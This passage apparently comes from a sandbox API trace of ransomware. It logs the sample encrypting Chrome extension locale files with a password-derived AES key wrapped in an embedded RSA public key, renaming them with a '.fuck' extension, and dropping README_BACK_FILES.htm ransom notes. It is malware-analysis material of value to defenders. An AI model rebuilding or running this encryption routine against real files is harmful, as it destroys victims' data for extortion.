dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x293cbd8) returned 1 [0248.550] CryptImportPublicKeyInfo (in: hCryptProv=0x293cbd8, dwCertEncodingType=0x1, pInfo=0x2930e60*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2930e90*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2930e98*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x29376f8) returned 1 [0248.551] CryptEncrypt (in: hKey=0x29376f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0248.551] CryptEncrypt (in: hKey=0x29376f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x293bfa0*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x293bfa0*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0248.551] WriteFile (in: hFile=0x5d5c, lpBuffer=0x293bfa0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x293bfa0*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0248.552] ReadFile (in: hFile=0x5d58, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0x10e, lpOverlapped=0x0) returned 1 [0248.554] CryptEncrypt (in: hKey=0x2938af8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x10e, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x110) returned 1 [0248.554] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x110, lpOverlapped=0x0) returned 1 [0248.554] CloseHandle (hObject=0x5d58) returned 1 [0248.554] CloseHandle (hObject=0x5d5c) returned 1 [0248.554] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\messages.json"), bFailIfExists=0) returned 1 [0248.558] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\messages.json", dwFileAttributes=0x0) returned 1 [0248.558] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\messages.json.gsg")) returned 1 [0248.559] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\messages.json.fuck")) returned 1 [0248.560] CryptDestroyHash (hHash=0x2938978) returned 1 [0248.560] CryptDestroyKey (hKey=0x2938af8) returned 1 [0248.560] CryptReleaseContext (hProv=0x2939f38, dwFlags=0x0) returned 1 [0248.560] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0248.560] FindClose (in: hFindFile=0x29387f8 | out: hFindFile=0x29387f8) returned 1 [0248.561] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\readme_back_files.htm")) returned 0xffffffff [0248.561] AreFileApisANSI () returned 1 [0248.561] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3af0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0248.561] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0248.561] GetFileType (hFile=0x5d50) returned 0x1 [0248.561] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0248.563] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0248.563] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x29387f8 [0248.563] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0248.563] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0248.563] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0248.563] GetLastError () returned 0x0 [0248.563] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\messages.json")) returned 0x20 [0248.563] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\messages.json", dwFileAttributes=0x80) returned 1 [0248.564] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0248.564] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0248.569] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0248.569] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2939f38) returned 1 [0248.572] CryptCreateHash (in: hProv=0x2939f38, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0248.572] lstrlenA (lpString="osrRauaJWHpjVHoZEmzKfOkGzMlQm") returned 29 [0248.572] CryptHashData (hHash=0x29389f8, pbData=0x28cb328, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0248.572] CryptDeriveKey (in: hProv=0x2939f38, Algid=0x6610, hBaseData=0x29389f8, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2938af8) returned 1 [0248.573] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----m", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0248.573] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0248.573] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x293cdf8) returned 1 [0248.573] CryptImportPublicKeyInfo (in: hCryptProv=0x293cdf8, dwCertEncodingType=0x1, pInfo=0x2930a50*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2930a80*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2930a88*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2937b38) returned 1 [0248.573] CryptEncrypt (in: hKey=0x2937b38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0248.573] CryptEncrypt (in: hKey=0x2937b38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x293ce80*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x293ce80*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0248.574] WriteFile (in: hFile=0x5d58, lpBuffer=0x293ce80*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x293ce80*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0248.575] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xed, lpOverlapped=0x0) returned 1 [0248.576] CryptEncrypt (in: hKey=0x2938af8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xed, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xf0) returned 1 [0248.576] WriteFile (in: hFile=0x5d58, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xf0, lpOverlapped=0x0) returned 1 [0248.576] CloseHandle (hObject=0x5d5c) returned 1 [0248.576] CloseHandle (hObject=0x5d58) returned 1 [0248.576] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\messages.json"), bFailIfExists=0) returned 1 [0248.586] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\messages.json", dwFileAttributes=0x0) returned 1 [0248.587] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\messages.json.gsg")) returned 1 [0248.590] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\messages.json.fuck")) returned 1 [0248.591] CryptDestroyHash (hHash=0x29389f8) returned 1 [0248.591] CryptDestroyKey (hKey=0x2938af8) returned 1 [0248.591] CryptReleaseContext (hProv=0x2939f38, dwFlags=0x0) returned 1 [0248.591] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0248.591] FindClose (in: hFindFile=0x29387f8 | out: hFindFile=0x29387f8) returned 1 [0248.591] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\readme_back_files.htm")) returned 0xffffffff [0248.591] AreFileApisANSI () returned 1 [0248.591] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0248.591] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0248.592] GetFileType (hFile=0x5d50) returned 0x1 [0248.592] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0248.593] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0248.593] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x29387f8 [0248.594] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0248.594] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0248.594] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0248.594] GetLastError () returned 0x0 [0248.595] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_cn\\messages.json")) returned 0x20 [0248.595] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\messages.json", dwFileAttributes=0x80) returned 1 [0248.598] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_cn\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0248.598] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_cn\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0248.599] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0248.599] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2939f38) returned 1 [0248.602] CryptCreateHash (in: hProv=0x2939f38, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0248.602] lstrlenA (lpString="osrRauaJWHpjVHoZEmzKfOkGzMlQm") returned 29 [0248.602] CryptHashData (hHash=0x2938978, pbData=0x28cb670, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0248.602] CryptDeriveKey (in: hProv=0x2939f38, Algid=0x6610, hBaseData=0x2938978, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2938af8) returned 1 [0248.602] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----m", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0248.602] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0248.602] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x293be90) returned 1 [0248.603] CryptImportPublicKeyInfo (in: hCryptProv=0x293be90, dwCertEncodingType=0x1, pInfo=0x29310d0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2931100*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2931108*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x29373b8) returned 1 [0248.603] CryptEncrypt (in: hKey=0x29373b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0248.603] CryptEncrypt (in: hKey=0x29373b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x293c1c0*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x293c1c0*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0248.603] WriteFile (in: hFile=0x5d5c, lpBuffer=0x293c1c0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x293c1c0*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0248.604] ReadFile (in: hFile=0x5d58, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xd7, lpOverlapped=0x0) returned 1 [0248.605] CryptEncrypt (in: hKey=0x2938af8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xd7, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xe0) returned 1 [0248.605] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xe0, lpOverlapped=0x0) returned 1 [0248.606] CloseHandle (hObject=0x5d58) returned 1 [0248.606] CloseHandle (hObject=0x5d5c) returned 1 [0248.606] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_cn\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_cn\\messages.json"), bFailIfExists=0) returned 1 [0248.609] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\messages.json", dwFileAttributes=0x0) returned 1 [0248.610] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_cn\\messages.json.gsg")) returned 1 [0248.611] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user 